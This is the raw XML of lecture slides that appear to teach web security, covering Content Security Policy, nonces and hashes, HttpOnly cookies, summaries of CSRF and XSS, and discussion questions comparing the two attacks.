            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046521" y="1226979"/>
            <a:ext cx="7557927" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Inline vs. link: which one is bad?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Idea behind CSP: server tells browser which sources to trust</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2204864"/>
            <a:ext cx="7699737" cy="1867758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361955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676916"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSP Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="1447087"/>
            <a:ext cx="8100392" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Policy based on the origin of the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The above is included in the HTTP response header </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a: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2132856"/>
            <a:ext cx="6806172" cy="498592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327108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535933"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to securely allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inlined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="1700808"/>
            <a:ext cx="8520600" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Using nonce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Using hash of the code</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381" y="2509254"/>
            <a:ext cx="7568112" cy="304115"/>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381" y="2948118"/>
            <a:ext cx="5462082" cy="1605153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6883450" y="3095906"/>
            <a:ext cx="955262" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allowed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6883450" y="4107127"/>
            <a:ext cx="1346394" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not allowed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165892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535933"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other add-on countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="1700808"/>
            <a:ext cx="7344816" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Browser native defense: X-XSS-Protection header in IE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Should use a defense-in-depth approach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313566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535933"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary: CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="1484784"/>
            <a:ext cx="7344816" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Victim:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Attacker goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Attacker tricking mechanism:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40913467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535933"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary: CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="1484784"/>
            <a:ext cx="7344816" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Victim: user who has an account on a vulnerable server where requests from the user’s browser to the server have a predictable structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Attacker goal: make requests to the server via the user’s browser that look to the server like the user intended to make them </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Attacker tricking mechanism: get the user to visit a web page under the attacker’s control and embed something like &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>=…&gt; to force the user to send it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31990665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535933"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary: XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="1484784"/>
            <a:ext cx="7344816" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Victim:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Attacker goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Attacker tricking mechanism:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33504336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535933"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary: XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="1484784"/>
            <a:ext cx="7344816" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Victim: user who executes malicious code that is sent via the vulnerable web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Attacker goal: get their malicious code the same privilege as that from the vulnerable website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188" indent="-230188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Attacker tricking mechanism: get the user to click on a malicious link via social engineering (reflected XSS); none (stored XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="430329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971600" y="404664"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Problem with Cross-Site Requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115617" y="1168264"/>
            <a:ext cx="7488831" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When a request is sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from a page coming from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, the browser attaches all the cookies belonging to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now, when a request is sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from another site, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, the browser will attach B’s cookies too.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Because of this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of the browsers, the server cannot distinguish between same-site and cross-site requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It is possible for third-party websites to forge requests that are exactly the same as same-site requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0432FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Request Forgery (CSRF).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2358254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952" y="593367"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discussion Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019952" y="1536633"/>
            <a:ext cx="7728512" cy="4555200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Question 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: What are the main differences of CSRF and XSS attacks? They both have “cross site” in their names.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Question 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Can we use the countermeasures against CSRF attacks to defend against XSS attacks, including the secret token and same-site cookie approaches?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3821500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209926" y="2400732"/>
            <a:ext cx="7466530" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4800" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4800" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4800" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>equest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4800" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4800" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>orgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
